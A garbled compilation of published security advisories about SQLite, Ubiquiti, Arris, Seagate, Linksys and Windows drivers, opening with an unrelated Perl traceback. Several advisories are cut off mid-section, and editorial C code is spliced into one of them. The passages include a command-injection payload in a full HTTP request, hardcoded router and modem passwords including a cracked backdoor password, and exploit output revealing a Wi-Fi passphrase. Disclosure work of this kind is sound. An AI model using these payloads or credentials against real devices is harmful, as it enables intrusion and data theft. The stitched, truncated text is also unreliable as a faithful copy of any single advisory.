Perl traceback:

The 'file' parameter ("/var/tmp/VPNDeployment-07a0d152-09fc-11e6-93cc-9d074250060f;.lock") to SF::System::chmod did not pass the 'Type Validator (system.file)' callback at /usr/local/sf/lib/perl/5.10.1/SF/System.pm line 73
	SF::System::__ANON__('The \'file\' parameter ("/var/tmp/VPNDeployment-07a0d152-09fc...') called at /usr/local/sf/lib/perl/5.10.1/SF/System.pm line 640
	SF::System::chmod('HASH(0x114c3c88)') called at /usr/local/sf/lib/perl/5.10.1/SF/Util.pm line 619
	SF::Util::wait_for_lock('/var/tmp/VPNDeployment-07a0d152-09fc-11e6-93cc-9d074250060f;', 120) called at /usr/local/sf/lib/perl/5.10.1/SF/EODataHandler/VPNDeployment.pm line 206
	SF::EODataHandler::VPNDeployment::get_lock('07a0d152-09fc-11e6-93cc-9d074250060f;') called at /usr/local/sf/lib/perl/5.10.1/SF/UI/PJB/Vpn/List.pm line 540
	SF::UI::PJB::Vpn::List::saveVpnDeployment('HASH(0x1154bf38)', 'ARRAY(0x11513750)') called at /usr/local/sf/lib/perl/5.10.1/SF/UI/PJB.pm line 859
	SF::UI::PJB::executeFunction('SF::UI::PJB::Vpn::List::saveVpnDeployment', 'ARRAY(0x11513720)') called at /usr/local/sf/lib/perl/5.10.1/SF/UI/PJB.pm line 821
	SF::UI::PJB::handleRequest('SF::UI::PJB::Vpn::List::saveVpnDeployment', '[{"password":"test", "authentication_method":"password", "typ...') called at /usr/local/sf/lib/perl/5.10.1/SF/Mojo/Handlers/PjbHandler.pm line 39
	eval {...} called at /usr/local/sf/lib/perl/5.10.1/SF/Mojo/Handlers/PjbHandler.pm line 42
	SF::Mojo::Handlers::PjbHandler::handle_pjb_cgi('SF::Mojo::Handlers::PjbHandler=HASH(0x1152d7a0)') called at
KL-001-2016-003 : SQLite Tempdir Selection Vulnerability
Title: SQLite Tempdir Selection Vulnerability
Advisory ID: KL-001-2016-003
Publication Date: 2016.07.01
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2016-003.txt

1. Vulnerability Details

Affected Vendor: SQLite/Hwaci
Affected Product: SQLite
Affected Version: All versions prior to 3.13.0
Platform: UNIX, GNU/Linux
CWE Classification: CWE-379: Creation of Temporary File in Directory with Incorrect Permissions
Impact: Data Leakage
Attack vector: Local

2. Vulnerability Description

Usually processes writing to temporary directories do not need to perform readdir() because they control the filenames they create, so setting /tmp/, /var/tmp/, etc. to be mode 1733 is a not uncommon UNIX hardening practice.

Affected versions of SQLite reject potential tempdir locations if they are not readable, falling back to '.'. Thus, SQLite will favor e.g. using cwd for tempfiles on such a system, even if cwd is an unsafe location. Notably, SQLite also checks the permissions of '.', but ignores the results of that check.

By itself, this is only a POLA (Principle of Least Astonishment) violation that may cause unexpected failures. However, this might in turn cause software that uses SQLite libraries to behave in unsafe ways, leaking sensitive data, opening up SQLite libraries to attack by deliberately corrupted tempfiles, etc.

3. Technical Description

SQLite creates tempfiles only under certain specific circumstances, and the behavior is tunable in various ways; see https://www.sqlite.org/tempfiles.html for more background. Generally speaking, the below does not apply for rollback journals, master journals, write-ahead log (WAL) files, or shared-memory (-shm) files. It may apply for various other tempfile types.

When a tempfile must be created, sanity checks are performed on candidate tempdir locations; these checks are flawed.

src/os_unix.c (which is merged into sqlite3.c during the release-tarball preparation process) performs these checks when considering candidate temporary directory locations (quoted from commit 0064a8c77b, 2016-02-23):

/*
** Return the name of a directory in which to put temporary files.
** If no suitable temporary file directory can be found, return NULL.
*/
static const char *unixTempFileDir(void){
  static const char *azDirs[] = {
     0,
     0,
     "/var/tmp",
     "/usr/tmp",
     "/tmp",
     "."
  };
  unsigned int i;
  struct stat buf;
  const char *zDir = sqlite3_temp_directory;
  if( !azDirs[0] ) azDirs[0] = getenv("SQLITE_TMPDIR");
  if( !azDirs[1] ) azDirs[1] = getenv("TMPDIR");
  for(i=0; i
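A defensive counterpart to the check the advisory describes, added here as an illustration and not SQLite's code (the functions tempdir_is_usable, select_tempdir and default_tempdir are my own names): it tests a candidate directory for write plus search permission (W_OK|X_OK) rather than read, so a mode-1733 sticky directory is accepted, and it returns NULL instead of falling back to the current working directory when no candidate qualifies.

```c
/* Added illustration, not SQLite's code: a temporary-directory selector
 * that applies the checks a tempfile writer actually needs.  Unlike the
 * flawed check described in the advisory, it
 *   - requires write+search (W_OK|X_OK), not read, so a mode-1733
 *     sticky directory is accepted;
 *   - never falls back to "." (the current working directory);
 *   - consults $TMPDIR first, then the conventional system locations.
 * Function names are my own.
 */
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Return 1 if dir exists, is a directory and is writable and searchable
 * by the calling process; 0 otherwise. */
int tempdir_is_usable(const char *dir){
  struct stat st;
  if( dir==NULL || dir[0]=='\0' ) return 0;
  if( stat(dir, &st)!=0 ) return 0;       /* missing or inaccessible */
  if( !S_ISDIR(st.st_mode) ) return 0;    /* exists but is not a directory */
  /* Creating a uniquely named file of our own never needs readdir(),
   * so read permission is deliberately not part of the test. */
  if( access(dir, W_OK|X_OK)!=0 ) return 0;
  return 1;
}

/* Return the first usable candidate, or NULL when none qualifies.
 * The caller must treat NULL as an error rather than substituting cwd. */
const char *select_tempdir(const char *const *candidates, size_t n){
  size_t i;
  for(i=0; i<n; i++){
    if( tempdir_is_usable(candidates[i]) ) return candidates[i];
  }
  return NULL;
}

/* Candidate list in the same spirit as SQLite's: the environment first,
 * then the system locations.  Note that "." is deliberately absent. */
const char *default_tempdir(void){
  const char *cands[4];
  cands[0] = getenv("TMPDIR");   /* may be NULL; select_tempdir skips it */
  cands[1] = "/var/tmp";
  cands[2] = "/usr/tmp";
  cands[3] = "/tmp";
  return select_tempdir(cands, 4);
}

int main(void){
  const char *d = default_tempdir();
  printf("tempdir: %s\n", d ? d : "(none; refusing to fall back to cwd)");
  return d ? 0 : 1;
}
```

The important design choice is the NULL return: a caller that cannot find a safe temporary directory should fail loudly rather than silently write into whatever directory it happens to be running from, which is the behaviour the advisory flags as the root of the problem.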
KL-001-2016-002 : Ubiquiti Administration Portal CSRF to Remote Command Execution
Title: Ubiquiti Administration Portal CSRF to Remote Command Execution
Advisory ID: KL-001-2016-002
Publication Date: 2016.06.28
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2016-002.txt

1. Vulnerability Details

Affected Vendor: Ubiquiti
Affected Product: AirGateway, AirFiber, mFi
Affected Version: 1.1.6, 3.2, 2.1.11
Platform: Embedded Linux
CWE Classification: CWE-352: Cross-Site Request Forgery (CSRF); CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')
Impact: Arbitrary Code Execution
Attack vector: HTTP

2. Vulnerability Description

The Ubiquiti AirGateway, AirFiber and mFi platforms feature remote administration via an authenticated web-based portal. Lack of CSRF protection in the Remote Administration Portal, and unsafe passing of user input to operating system commands executed with root privileges, can be abused in a way that enables remote command execution.

3. Technical Description

The firmware files analyzed were AirGWP.v1.1.6.28062.150731.1520.bin, AF24.v3.2.bin, and firmware.bin respectively. The MD5 hash values for the vulnerable files served by the administration portal are:

AirGateway  b45fe8e491d62251f0a7a100c636178a  /usr/www/system.cgi
AirFiber    d8926f7f65a2111f4036413f985082b9  /usr/www/system.cgi
mFi         960e8f6e507b227dbc4b65fc7a7036bc  /usr/www/system.cgi

The firmware file contains an LZMA compressed squashfs partition. The binaries running on the embedded device are compiled for a MIPS CPU. The device can be easily virtualized using QEMU:

Example:

sudo /usr/sbin/chroot . ./qemu-mips-static /usr/sbin/lighttpd -f /etc/lighttpd/lighttpd.conf

The administration portal does not issue a randomized CSRF token either per session, page, or request. Administration authorization is solely based on cookie control. Therefore, it is possible to embed JavaScript into an HTML page so that when an administrator is socially engineered into visiting the page, the target device will be accessed with privileges.

Device configuration POST parameters include tokens passed to operating system commands run as root in unsafe ways with insufficient input sanitization. Command injection is possible by stacking shell commands in parameters such as iptables.1.cmd.

In order for a developer to recreate this discovery, the following instructions should be duplicated.

a. Authenticate to the target web application and navigate to the SYSTEM page.
b. Download the current configuration.
c. Open the configuration in an editor of your choice, navigate to the line containing:
   iptables.1.cmd=-A FIREWALL -j ACCEPT
d. Append the following onto that line:
   ;touch /var/tmp/csrf-to-rce.txt
e. Save the changes, and submit the modified configuration. Apply the changes using apply.cgi afterward.

Example:

POST /system.cgi HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://192.168.1.1/system.cgi
Cookie: ui_language=en_US; last_check=1452020493426; AIROS_SESSIONID=e5f61a5c0a9d0690b4efd484e56b8c93
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---4384928471732886672453075690
Content-Length: 7204

...
iptables.1.cmd=-A FIREWALL -j ACCEPT; touch /var/tmp/csrf-to-rce.txt
...

GET /apply.cgi?testmode=&_=[redacted] HTTP/1.1
Host: 192.168.1.1
X-Requested-With: XMLHttpRequest
Referer: https://192.168.1.1/system.cgi
Cookie: ui_language=en_US; last_check=1452020493426; AIROS_SESSIONID=e5f61a5c0a9d0690b4efd484e56b8c93
Connection: keep-alive

f. Change your IP address, but ensure continued routing to the target web application. Incrementing the last octet is sufficient.
g. Open the configuration in an editor of your choice, navigate to the modified line and alter it:
   ;touch /var/tmp/csrf-to-rce-newsrc.txt
h. Repeat step 5 from the new IP address. You will receive the same response. Apply the changes using the apply.cgi file.
i. Login to the target device using SSH or telnet, navigate to /var/tmp and type ls.
j. You'll discover both files exist.

4. Mitigation and Remediation Recommendation

At this time there is
KL-001-2016-001 : Arris DG1670A Cable Modem Remote Command Execution
Title: Arris DG1670A Cable Modem Remote Command Execution
Advisory ID: KL-001-2016-001
Publication Date: 2016.02.12
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2016-001.txt

1. Vulnerability Details

Affected Vendor: Arris
Affected Product: Cable Modem
Affected Version: DG1670A, TG1670
Platform: Embedded Linux
CWE Classification: CWE-73: External Control of File Name or Path; CWE-77: Improper Neutralization of Special Elements used in a Command; CWE-522: Insufficiently Protected Credentials
Impact: Arbitrary Code Execution
Attack vector: Telnet
CVE-ID:

2. Vulnerability Description

The Arris DG1670A leverages a combination of technologies to deliver the product functionality. Combining several of these technologies in an unanticipated way will allow an attacker to execute arbitrary commands on the underlying operating system as the most privileged user.

3. Technical Description

Use the password: JhAkuo18

On August 28, 2015 a user on GitHub by the name of GuerrillaWarfare posted a new repository named Junkyard. The repository had firmware images for popular cable modems.

Repository: https://github.com/GuerrillaWarfare/Junkyard
Filename: TS0801102P_100714_NA.16XX.GW.ATOM.img

Below is the directory content of the squashfs-root directory contained within the image:

# ls
bin  etc  gw.fsname  include  linuxrc  nvram  sbin     share   tmp      var  version
dev  fss  hdisk1     lib      mnt      proc   scripts  sysusr  var.tar  vop

The default IP address assigned to Arris modems is 192.168.100.1 and is routable from networks where the modem is attached. Below is Nmap output of services listening on the default IP address:

# sudo nmap -T5 -sU -sT -p- 192.168.100.1
Nmap scan report for 192.168.100.1
Host is up (0.0053s latency).
PORT     STATE SERVICE  VERSION
80/tcp   open  http     lighttpd
443/tcp  open  ssl/http lighttpd
2602/tcp open  ripd?
8080/tcp open  http     lighttpd

A service listening on port 2602 is usually associated with Quagga. Going back to the squashfs-root directory, if we grep through the content of this file system there are several .conf files containing passwords. One of the files containing passwords is zebra.conf, which can be used to authenticate to the Quagga telnet console.

# grep -ri "password" *.conf|more
etc/default/ripngd.conf:password JhAkuo18
etc/default/zebra.conf:password JhAkuo18
etc/default/ripd.conf:password JhAkuo18

$ telnet 192.168.100.1 2602
Trying 192.168.100.1...
Connected to 192.168.100.1.
Escape character is '^]'.

Hello, this is Quagga (version 0.99.16).
Copyright 1996-2005 Kunihiro Ishiguro, et al.

User Access Verification

Password:
PROMPT>

Entering a '?' at any point gives context-sensitive help text. There are several layers of 'privilege', though there are no restrictions on elevating on this device. Quagga is an open-source routing daemon commonly found in routers, access points, and modems. In the case described, it has been implemented on a cable modem to facilitate route provisioning from the local ISP to the public internet.

PROMPT> ?
  echo      Echo a message back to the vty
  enable    Turn on privileged mode command
  exit      Exit current mode and down to previous mode
  help      Description of the interactive help system
  list      Print command list
  quit      Exit current mode and down to previous mode
  show      Show running system information
  terminal  Set terminal line parameters
  who       Display who is on vty

PROMPT> enable
PROMPT# ?
  clear      Reset functions
  configure  Configuration from vty interface
  copy       Copy configuration
  debug      Debugging functions (see also 'undebug')
  disable    Turn off privileged mode command
  echo       Echo a message back to the vty
  end        End current mode and change to enable mode.
  exit       Exit current mode and down to previous mode
  help       Description of the interactive help system
  list       Print command list
  logmsg     Send a message to enabled logging destinations
  no         Negate a command or set its defaults
  quit       Exit current mode and down to previous mode
  show       Show running system information
  terminal   Set terminal line parameters
  who        Display who is on vty
  write      Write running configuration to memory,
KL-001-2015-007 : Seagate GoFlex Satellite Remote Telnet Default Password
Title: Seagate GoFlex Satellite Remote Telnet Default Password
Advisory ID: KL-001-2015-007
Publication Date: 2015.12.18
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2015-007.txt

1. Vulnerability Details

Affected Vendor: Seagate
Affected Product: GoFlex Satellite
Affected Version: 1.3.7
Platform: Embedded Linux
CWE Classification: CWE-288: Authentication Bypass Using an Alternate Path or Channel; CWE-798: Use of Hard-coded Credentials
Impact: Remote Administration
Attack vector: Telnet
CVE-ID: CVE-2015-2874

2. Vulnerability Description

Seagate GoFlex Satellite Mobile Wireless Storage devices contain a hardcoded backdoor account. An attacker could use this account to remotely tamper with the underlying operating system when Telnet is enabled.

3. Technical Description

root@wpad:/tmp/jfroot# ls
bin  boot  dev  etc  home  include  lib  linuxrc  media  mnt  proc  satellite_app  sbin  share  srv  static  sys  tmp  usr  var
root@wpad:/tmp/jfroot# cd etc
root@wpad:/tmp/jfroot/etc# ls
angstrom-version  default            fstab     init.d            iproute2     motd           org_passwd  protocols  rc4.d  rS.d             terminfo         udhcpc.d
autoUpdURL        device_table       group     inittab           issue        mtab           passwd      rc0.d      rc5.d  scsi_id.config   timestamp        udhcpd.conf
avahi             device_table-opkg  host.conf inputrc           issue.net    network        passwd-     rc1.d      rc6.d  services         tinylogin.links  udhcpd_factory.conf
busybox.links     fb.modes           hostname  internal_if.conf  localtime    nsswitch.conf  profile     rc2.d      rcS.d  skel             ts.conf          version
dbus-1            filesystems        hosts     ipkg              mke2fs.conf  opkg           profile.d   rc3.d      rpc    syslog.conf      udev
root@wpad:/tmp/jfroot/etc# cat passwd
root:VruSTav0/g/yg:0:0:root:/home/root:/bin/sh
daemon:*:1:1:daemon:/usr/sbin:/bin/sh
bin:*:2:2:bin:/bin:/bin/sh
sys:*:3:3:sys:/dev:/bin/sh
sync:*:4:65534:sync:/bin:/bin/sync
games:*:5:60:games:/usr/games:/bin/sh
man:*:6:12:man:/var/cache/man:/bin/sh
lp:*:7:7:lp:/var/spool/lpd:/bin/sh
mail:*:8:8:mail:/var/mail:/bin/sh
news:*:9:9:news:/var/spool/news:/bin/sh
uucp:*:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:*:13:13:proxy:/bin:/bin/sh
www-data:*:33:33:www-data:/var/www:/bin/sh
backup:*:34:34:backup:/var/backups:/bin/sh
list:*:38:38:Mailing List Manager:/var/list:/bin/sh
irc:*:39:39:ircd:/var/run/ircd:/bin/sh
gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:*:65534:65534:nobody:/nonexistent:/bin/sh
xoFaeS:QGd9zEjQYxxf2:500:500:Linux User,,,:/home/xoFaeS:/bin/sh

The xoFaeS user cracked to etagknil.

4. Mitigation and Remediation Recommendation

The vendor has released a patch that can be obtained using the Download Finder located at
https://apps1.seagate.com/downloads/request.html

5. Credit

This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc.

6. Disclosure Timeline

2015.09.11 - Vulnerability details and PoC sent to Seagate.
2015.09.15 - Seagate confirms receipt.
2015.09.28 - Seagate indicates a patch is ready but not yet available to the public.
2015.09.28 - KoreLogic asks Seagate if they have obtained a CVE-ID for the vulnerability.
2015.10.27 - Seagate notifies KoreLogic that the patch is publicly available. Seagate indicates they are waiting for a CVE before releasing a security advisory.
2015.12.08 - KoreLogic requests an update on the CVE-ID and associated Seagate advisory.
2015.12.08 - Seagate responds with a link to http://www.kb.cert.org/vuls/id/903500
2015.12.18 - Public disclosure.

7. Proof of Concept

N/A

The contents of this advisory are copyright(c) 2015 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/
KL-001-2015-008 : Dell Pre-Boot Authentication Driver Uncontrolled Write to Arbitrary Address
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 KL-001-2015-008 : Dell Pre-Boot Authentication Driver Uncontrolled Write to Arbitrary Address Title: Dell Pre-Boot Authentication Driver Uncontrolled Write to Arbitrary Address Advisory ID: KL-001-2015-008 Publication Date: 2015.12.18 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2015-008.txt 1. Vulnerability Details Affected Vendor: Dell Affected Product: Pre-Boot Authentication Driver Affected Version: 1.0.1.5 Platform: Microsoft Windows XP SP3, Microsoft Windows 2003 SP2, Microsoft Windows 7 CWE Classification: CWE-20: Improper input validation Impact: Arbitrary Code Execution Attack vector: IOCTL CVE-ID: CVE-2015-6856 2. Vulnerability Description The Dell Pre-Boot Authentication Driver (PBADRV.sys) contains a vulnerability that can be leveraged to enable an attacker to write arbitrary code. The 'OutputAddress' from the IOCTL call is not validated before it attempts to write to memory. The content of the write is a four-byte hex value that is always greater than that of the kernel base address. Using multiple writes, it may be possible to overwrite the first entry of HalDispatchTable in a way that the entry would point to a user-land address. An attacker need only allocate shellcode at said address and call the ntdll!NtQueryIntervalProfile() function. 3. Technical Description Example against Windows XP: Microsoft (R) Windows Debugger Version 6.12.0002.633 X86 Copyright (c) Microsoft Corporation. All rights reserved. 
Loading Dump File [C:\WINXP\MEMORY.DMP]
Kernel Complete Dump File: Full address space is available

Symbol search path is: srv*
Executable search path is:
Windows XP Kernel Version 2600 (Service Pack 3) UP Free x86 compatible
Product: WinNt, suite: TerminalServer SingleUserTS
Built by: 2600.xpsp_sp3_qfe.101209-1646
Machine Name:
Kernel base = 0x804d7000 PsLoadedModuleList = 0x805540c0
Debug session time: Tue Feb  3 05:41:17.712 2015 (UTC - 8:00)
System Uptime: 0 days 0:03:46.296
Loading Kernel Symbols

kd> !analyze -v

READ_ADDRESS: 909090d4

FAULTING_IP:
+2902faf00efdfc0
0008 8b4044 mov eax,dword ptr [eax+44h]

MM_INTERNAL_CODE: 0
DEFAULT_BUCKET_ID: DRIVER_FAULT
BUGCHECK_STR: 0x50
PROCESS_NAME: pythonw.exe

TRAP_FRAME: b24bdc8c -- (.trap 0xb24bdc8c)
ErrCode =
eax=90909090 ebx=8060ea01 ecx= edx=0021f7f0 esi=012c1be8 edi=b24bdd64
eip=0008 esp=b24bdd00 ebp=b24bdd20 iopl=0 nv up ei ng nz na pe nc
cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs= efl=00010286
0008 8b4044 mov eax,dword ptr [eax+44h] ds:0023:909090d4=
Resetting default scope

LAST_CONTROL_TRANSFER: from 8051cc7f to 804f8cc5

STACK_TEXT:
b24bdc14 8051cc7f 0050 909090d4 nt!KeBugCheckEx+0x1b
b24bdc74 805405d4 909090d4 nt!MmAccessFault+0x8e7
b24bdc74 0008 909090d4 nt!KiTrap0E+0xcc
WARNING: Frame IP not in any known module. Following frames may be wrong.
b24bdcfc 8063d5cd 0001 000c b24bdd14 0x8
b24bdd20 8060eb43 0002 b24bdd64 0021f7f8 nt!KeQueryIntervalProfile+0x37
b24bdd54 8053d6d8 0002 012c1be8 0021f7fc nt!NtQueryIntervalProfile+0x61
b24bdd54 7c90e514 0002 012c1be8 0021f7fc nt!KiFastCallEntry+0xf8
0021f7e4 7c90d84a 1d1add9a 0002 012c1be8 ntdll!KiFastSystemCallRet
0021f7e8 1d1add9a 0002 012c1be8 0021f89c ntdll!NtQueryIntervalProfile+0xc
0021f7fc 1d1acab6 1d1ac900 0021f81c 0008 _ctypes!DllCanUnloadNow+0x5b6a
0021f82c 1d1a8db8 7c90d83e 0021f920 24f7d09f _ctypes!DllCanUnloadNow+0x4886
0021f8dc 1d1a959e 1100 7c90d83e 0021f910 _ctypes!DllCanUnloadNow+0xb88
0021f984 1d1a54d8 7c90d83e 012d4300 _ctypes!DllCanUnloadNow+0x136e
0021f9dc 1e07cf0c 012d4300 _ctypes+0x54d8
5044408b 04bb 88808b00 python27!PyObject_Call+0x4c

STACK_COMMAND: kb

FOLLOWUP_IP:
nt!KiTrap0E+cc
805405d4 85c0 test eax,eax

SYMBOL_STACK_INDEX: 2
SYMBOL_NAME: nt!KiTrap0E+cc
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: nt
IMAGE_NAME: ntkrnlpa.exe
DEBUG_FLR_IMAGE_TIMESTAMP: 4d00d4fb
FAILURE_BUCKET_ID: 0x50_nt!KiTrap0E+cc
BUCKET_ID: 0x50_nt!KiTrap0E+cc
Followup: MachineOwner
---------

Example against Windows 7:

Microsoft (R) Windows Debugger Version 6.3.9600.17298 X86
Copyright (c) Microsoft Corporation. All rights reserved.

Loading Dump File [C:\Users\dev\Desktop\Mini091715-01.dmp]
Mini Kernel Dump File: Only registers and stack trace are available

Symbol search path is: *** Invalid ***
KL-001-2015-006 : Linksys EA6100 Wireless Router Authentication Bypass
Title: Linksys EA6100 Wireless Router Authentication Bypass
Advisory ID: KL-001-2015-006
Publication Date: 2015.12.04
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2015-006.txt

1. Vulnerability Details

Affected Vendor: Linksys
Affected Product: EA6100 - EA6300 Wireless Router
Affected Version: 1.1.5
Platform: Embedded Linux
CWE Classification: CWE-288: Authentication Bypass Using an Alternate Path or Channel
Impact: Remote Administration
Attack vector: HTTP
CVE-ID:

2. Vulnerability Description

Multiple CGI scripts in the web-based administrative interface of the Linksys EA6100 - EA6300 Wireless Router allow unauthenticated access to the high-level administrative functions of the device. This vulnerability can be leveraged by an unauthenticated attacker to obtain the router's administrative password and subsequently arbitrarily configure the device.

3. Technical Description

root@wpad:/tmp/_FW_EA6100_1.1.5.162431_prod.img.extracted/test# ls
bin  dev  etc  home  JNAP  lib  libexec  linuxrc  mnt  opt  proc  root  sbin  sys  tmp  usr  var  www
root@wpad:/tmp/_FW_EA6100_1.1.5.162431_prod.img.extracted/test# cd www
root@wpad:/tmp/_FW_EA6100_1.1.5.162431_prod.img.extracted/test/www# ls
bootloader_info.cgi  dhcp_log.txt  get_counter_info.cgi  incoming_log.txt  JNAP  outgoing_log.txt  security_log.txt  sysinfo.cgi  usbinfo.cgi
cgi-bin  ezwifi_cfg.cgi  getstinfo.cgi  jcgi  license.pdf  qos_info.cgi  speedtest_info.cgi  ui
root@wpad:/tmp/_FW_EA6100_1.1.5.162431_prod.img.extracted/test/www# ls -la sysinfo.cgi
lrwxrwxrwx 1 root root 23 Jul 21  2014 sysinfo.cgi -> /www/ui/cgi/sysinfo.cgi
root@wpad:/tmp/_FW_EA6100_1.1.5.162431_prod.img.extracted/test/www# cat ui/cgi/sysinfo.cgi
#!/bin/sh
# sysinfo.sh > /www/sysinfo.cgi
#
# When adding new debug information into this script file
# do the following:
# 1) create your debug script
# 2) call your debug script in this sysinfo.sh script
#    using the format:
#    if [ -f ]; then
#       ./
#    fi
...
...

Other CGI files that are accessible from an unauthenticated perspective can be used to configure settings for the affected device. This led to the development of an exploit to abuse these vulnerabilities.

level:Debug level$ ./linksys-ea6100-auth-bypass -h
Usage: ./linksys-ea6100-auth-bypass [params]
   -h   Help Menu
   -i   Target Address
   -r   Reset Attack
   -g   Get System Info
   -p   Get Wifi Password
Example: ./linksys-ea6100-auth-bypass -i 10.10.10.1 -r
Brought to you by Level at KoreLogic

level:Debug level$ ./linksys-ea6100-auth-bypass -i 172.17.100.200 -p
Getting wireless passphrase
SSID=840146d6919
Passphrase=e0fc253e585bf33d7b

level:Debug level$ ./linksys-ea6100-auth-bypass -i 172.17.100.200 -g|more
Brought to you by Level at KoreLogic
Getting system info
page generated on Tue Jan 20 20:01:48 UTC 2015
UpTime: 20:01:48 up 3 days, 16:24, load average: 0.00, 0.04, 0.05
Firmware Version: 1.1.5.159694
Firmware Builddate: 2014-03-21 03:09
Product.type: production
Linux: Linux version 2.6.36 (root@build-vm) (gcc version 4.2.3) #1 Thu Mar 20 19:40:45 PDT 2014
Board: focus
...
...

4. Mitigation and Remediation Recommendation

No response from vendor; no remediation available.

5. Credit

This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc.

6. Disclosure Timeline

2015.09.10 - KoreLogic submits vulnerability details to secur...@linksys.com.
2015.10.05 - KoreLogic submits vulnerability details to secur...@linksys.com again.
2015.11.20 - KoreLogic requests CVE from MITRE.
2015.12.02 - KoreLogic requests CVE from MITRE.
2015.12.03 - KoreLogic requests CVE from MITRE.
2015.12.04 - KoreLogic requests CVE from MITRE.
2015.12.04 - Public disclosure.

7. Proof of Concept

#!/usr/bin/env python3
#
# Copyright 2015 KoreLogic Inc., All Rights Reserved.
#
# This proof of concept, having been partly or wholly developed
# and/or sponsored by KoreLogic, Inc., is hereby released under
# the terms and conditions set forth in the Creative Commons
# Attribution Share-Alike 4.0 (United States) License:
#
# http://creativecommons.org/licenses/by-sa/4.0/
#
KL-001-2015-005 : VBox Satellite Express Arbitrary Write Privilege Escalation
Title: VBox Satellite Express Arbitrary Write Privilege Escalation
Advisory ID: KL-001-2015-005
Publication Date: 2015.09.16
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2015-005.txt

1. Vulnerability Details

Affected Vendor: VBox Communications
Affected Product: Satellite Express Protocol
Affected Version: 2.3.17.3
Platform: Microsoft Windows XP SP3, Microsoft Windows 7 (x86)
CWE Classification: CWE-123: Write-what-where condition
Impact: Arbitrary Code Execution
Attack vector: IOCTL
CVE-ID: CVE-2015-6923

2. Vulnerability Description

A vulnerability within the ndvbs module allows an attacker to inject memory they control into an arbitrary location they define. This vulnerability can be used to overwrite function pointers in HalDispatchTable resulting in an elevation of privilege.

3. Technical Description

Example against Windows XP:

Windows XP Kernel Version 2600 (Service Pack 3) UP Free x86 compatible
Product: WinNt, suite: TerminalServer SingleUserTS
Built by: 2600.xpsp_sp3_qfe.101209-1646
Machine Name:
Kernel base = 0x804d7000 PsLoadedModuleList = 0x805540c0
Debug session time: Tue Mar 10 18:57:54.259 2015 (UTC - 7:00)
System Uptime: 0 days 0:11:19.843
*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

Use !analyze -v to get detailed debugging information.

BugCheck 50, {b41c5d4c, 0, 805068e1, 0}

Probably caused by : ndvbs.sys ( ndvbs+94f )

Followup: MachineOwner
---------

kd> kn

Call stack:

 # ChildEBP RetAddr
00 f64fda98 8051cc7f nt!KeBugCheckEx+0x1b
01 f64fdaf8 805405d4 nt!MmAccessFault+0x8e7
02 f64fdaf8 805068e1 nt!KiTrap0E+0xcc
03 f64fdbb0 80506aae nt!MmMapLockedPagesSpecifyCache+0x211
04 f64fdbd0 f650e94f nt!MmMapLockedPages+0x18
05 f64fdc34 804ee129 ndvbs+0x94f
06 f64fdc44 80574e56 nt!IopfCallDriver+0x31
07 f64fdc58 80575d11 nt!IopSynchronousServiceTail+0x70
08 f64fdd00 8056e57c nt!IopXxxControlFile+0x5e7
09 f64fdd34 8053d6d8 nt!NtDeviceIoControlFile+0x2a
0a f64fdd34 7c90e514 nt!KiFastCallEntry+0xf8
0b 0021f3e4 7c90d28a ntdll!KiFastSystemCallRet
0c 0021f3e8 1d1add7a ntdll!ZwDeviceIoControlFile+0xc
0d 0021f41c 1d1aca96 _ctypes!DllCanUnloadNow+0x5b4a
0e 0021f44c 1d1a8db8 _ctypes!DllCanUnloadNow+0x4866
0f 0021f4fc 1d1a959e _ctypes!DllCanUnloadNow+0xb88
10 0021f668 1d1a54d8 _ctypes!DllCanUnloadNow+0x136e
11 0021f6c0 1e07bd9c _ctypes+0x54d8
12 python27!PyObject_Call+0x4c

Example against Windows 7:

Microsoft (R) Windows Debugger Version 6.3.9600.17298 X86
Copyright (c) Microsoft Corporation. All rights reserved.

Windows 7 Kernel Version 7601 (Service Pack 1) UP Free x86 compatible
Product: WinNt, suite: TerminalServer SingleUserTS Personal
Built by: 7601.17514.x86fre.win7sp1_rtm.101119-1850
Kernel base = 0x8280c000 PsLoadedModuleList = 0x82956850
Debug session time: Tue Sep 15 15:08:38.938 2015 (UTC - 7:00)
System Uptime: 0 days 0:27:26.358

kd> .symfix;.reload
Loading Kernel Symbols
...
Loading User Symbols
Loading unloaded module list

kd> !analyze -v
*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

KERNEL_MODE_EXCEPTION_NOT_HANDLED_M (108e)
This is a very common bugcheck.  Usually the exception address pinpoints
the driver/function that caused the problem.  Always note this address
as well as the link date of the driver/image that contains this address.
Some common problems are exception code 0x8003.  This means a hard
coded breakpoint or assertion was hit, but this system was booted
/NODEBUG.  This is not supposed to happen as developers should never have
hardcoded breakpoints in retail code, but ...
If this happens, make sure a debugger gets connected, and the
system is booted /DEBUG.  This will let us see why this breakpoint is
KL-001-2015-003 : SiS Windows VGA Display Manager Multiple Privilege Escalation
Title: SiS Windows VGA Display Manager Multiple Privilege Escalation
Advisory ID: KL-001-2015-003
Publication Date: 2015.09.01
